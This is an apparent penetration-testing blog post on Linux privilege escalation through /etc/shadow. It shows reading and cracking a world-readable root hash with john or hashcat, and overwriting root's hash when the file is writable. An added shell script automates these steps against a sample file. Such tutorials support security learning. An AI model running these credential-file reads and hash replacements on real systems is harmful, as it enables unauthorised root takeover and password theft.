Linux Privilege Escalation Part 1

Binamra Pandey
Oct 16, 2022 (2 min read)

After we gain an initial foothold on a machine, the next step is to escalate our privileges on it. In this writeup we will look at some basic ways to escalate privileges on Linux machines, starting with the /etc/shadow file.

1. Readable /etc/shadow file

The “shadow” file (/etc/shadow) is the system file that stores the hashed user passwords together with their password-ageing fields. It is normally readable only by root (and, on most distributions, the “shadow” group), but a misconfigured permission bit can leave it readable by every user. In that case an attacker can copy the “root” user’s hash and try to crack it offline.

In the screenshot from the target, the permission bits on the “shadow” file show that everyone can read it, so you can read the file and crack the hash.

1. Confirm the file is readable (the “other” bits in the ls -l listing should show r), then read it: cat /etc/shadow
2. Copy the root user’s hash: only the second colon-separated field, the part that starts with $6$ on most targets. Do not copy the fields after the next colon.
3. Crack it offline. hashcat needs the mode that matches the hash prefix ($6$ is sha512crypt, mode 1800); john detects the type itself and also accepts the whole shadow line.

With john use this command: “john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt”

2. Writeable /etc/shadow file

Sometimes you may be able to write to the “shadow” file. In this case you can generate a new password hash and replace the “root” user’s password hash with it, then log in as root with the password you chose.

Password hashes in /etc/shadow are produced by crypt(3), and the prefix of each hash tells you which algorithm was used: $6$ is sha-512 (sha512crypt), which is what most targets use, $5$ is sha-256 and $y$ is yescrypt on newer distributions. A sha-512 hash is accepted by every glibc-based Linux, so generating your new hash in that format is the safe choice whatever the existing hash uses.

Format of an /etc/shadow line (nine colon-separated fields)
“username:password_hash:last_change:min_days:max_days:warn_days:inactive_days:expire_date:reserved”

  1. Generate a new password hash with a password of your choice:
    mkpasswd -m sha-512 newpasswordhere
    (mkpasswd comes from the whois package; if it is not installed, openssl passwd -6 newpasswordhere produces the same kind of hash.)
  2. Back up the file, then edit /etc/shadow and replace the original root user’s password hash with the one you just generated.
    Note: Only replace the hash (the second field); leave the other fields and every other line untouched. A malformed line can lock accounts out, including the one you are trying to take over.
  3. Now switch to the root user with the password you chose: “su root”
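The script below is an added example and not part of the original post. It works both /etc/shadow procedures above against a constructed shadow-style file (the hash values are made-up placeholders), so it runs without root: it reports the “other” permission bits, pulls one user’s hash field, maps the crypt prefix to the hashcat mode, generates a sha-512 hash with openssl, and rewrites only the hash field of one line while preserving every other field. The function names and the sample file contents are my own assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post. Works the two /etc/shadow
# procedures against a constructed shadow-style file so it runs unprivileged.
# Function names and sample contents are assumptions made for this example.

# Constructed sample in /etc/shadow format (9 colon-separated fields). The
# hash values are made-up placeholders, not real crypt(3) output.
SAMPLE_SHADOW="$(mktemp)"
cat > "$SAMPLE_SHADOW" <<'EOF'
root:$6$rounds=5000$saltsalt$FAKEHASHVALUEFORDEMO:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
bob:$y$j9T$saltsalt$FAKEYESCRYPTHASH:19000:0:99999:7:::
EOF

# Readable shadow, step 1: what can "other" users do with the file?
# Prints the last three mode characters of ls -l, e.g. "r--" or "---".
world_perms() {  # usage: world_perms <file>
    ls -ld "$1" | cut -c8-10
}

# Step 2: pull just the hash field (field 2) for one user; empty if absent.
shadow_hash_for() {  # usage: shadow_hash_for <file> <user>
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# Step 3: the crypt(3) prefix names the algorithm, and so the hashcat mode.
# "locked" covers '*' and '!' entries (nothing to crack); "none" means hashcat
# has no mode for it (yescrypt), so use john instead.
hashcat_mode_for() {  # usage: hashcat_mode_for <hash>
    case "$1" in
        '$6$'*) echo 1800 ;;      # sha512crypt
        '$5$'*) echo 7400 ;;      # sha256crypt
        '$1$'*) echo 500 ;;       # md5crypt
        '$y$'*) echo none ;;      # yescrypt: john handles it, hashcat does not
        '*'|'!'*) echo locked ;;  # disabled account, no password to crack
        '') echo empty ;;         # no such user or empty field
        *) echo unknown ;;
    esac
}

# Writable shadow: make a sha512crypt hash for a password of your choice.
# openssl passwd -6 needs OpenSSL 1.1.1 or newer; mkpasswd -m sha-512 (whois
# package) produces the same format.
gen_sha512_hash() {  # usage: gen_sha512_hash <password>
    openssl passwd -6 "$1"
}

# Replace only field 2 of one user's line, keep every other field and line
# as they are, and write to a separate output file. On a real target back up
# /etc/shadow first and copy the result back without changing its mode.
replace_shadow_hash() {  # usage: replace_shadow_hash <in> <user> <newhash> <out>
    awk -F: -v OFS=: -v u="$2" -v h="$3" '$1 == u { $2 = h } { print }' "$1" > "$4"
}

# Demo run against the sample file.
chmod 644 "$SAMPLE_SHADOW"   # simulate the misconfiguration (world-readable)
echo "other perms: $(world_perms "$SAMPLE_SHADOW")"
for u in root daemon bob; do
    h=$(shadow_hash_for "$SAMPLE_SHADOW" "$u")
    echo "$u: $h -> hashcat mode $(hashcat_mode_for "$h")"
done
# e.g. hashcat -m "$(hashcat_mode_for "$h")" hash.txt /usr/share/wordlists/rockyou.txt
NEW_HASH='$6$demo$REPLACEMENTHASHFORDEMO'   # stands in for gen_sha512_hash output
replace_shadow_hash "$SAMPLE_SHADOW" root "$NEW_HASH" "$SAMPLE_SHADOW.new"
echo "after replacement: $(shadow_hash_for "$SAMPLE_SHADOW.new" root)"
```

The replacement is done with awk rather than a text editor so that only the second field of the matching line changes; the trailing empty fields of the nine-field format are kept intact, which is the mistake most easily made when editing the file by hand.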

That is how the /etc/shadow file can be used for privilege escalation in Linux. Will write more soon.

Thanks for reading.

Twitter:- @BinamraPandey
